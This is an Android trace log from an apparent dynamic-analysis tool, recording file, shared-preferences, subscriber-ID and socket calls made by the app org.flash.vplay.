D/S4URC   ( 2475): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [MODE][int] [0660]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][putInt] [Key][apnCachedNum] [Value][3]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [rename] [ORIG_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [NEW_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [RETURN][int] [80]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [MODE][int] [0660]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][putInt] [Key][parallelNum] [Value][2]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [rename] [ORIG_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [NEW_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [RETURN][int] [80]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [MODE][int] [0660]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][putInt] [Key][expireTime] [Value][180]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [rename] [ORIG_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [NEW_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [RETURN][int] [80]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [MODE][int] [0660]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][samplingInfo] [Value][0,1;-13,3;-17,5;-2,100;-1,100;-3,100;-14,3;-4,5;100]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [rename] [ORIG_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [NEW_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [RETURN][int] [83]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [MODE][int] [0660]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][access_cm] [Value][111.30.131.107:14000]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [rename] [ORIG_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [NEW_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [RETURN][int] [80]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [MODE][int] [0660]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][access_uni] [Value][125.39.213.69:14000]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [rename] [ORIG_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [NEW_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [RETURN][int] [80]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/files/ext.dex] [RETURN][int] [83]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/files/ext.jar] [RETURN][int] [83]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [MODE][int] [0660]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/vendor/lib]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/vendor/lib]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/system/lib]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/lib]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][access_ct] [Value][123.151.10.177:14000]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [NDK] [SYSCALL] [rename] [ORIG_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [NEW_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [RETURN][int] [77]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [MODE][int] [0660]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][putLong] [Key][timesStamp] [Value][1530602259000]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [rename] [ORIG_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [NEW_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [RETURN][int] [77]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [MODE][int] [0660]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [android.telephony.TelephonyManager] [getSubscriberId]
D/S4URC   ( 2475): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MsgPushDefinition.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MsgPushDefinition.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MsgPushDefinition.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][Enable] [Return][false]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MsgPushDefinition.xml] [MODE][MODE_PRIVATE] [Method][putInt] [Key][Icon] [Value][0]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml] [RETURN][int] [77]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml] [MODE][int] [0660]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
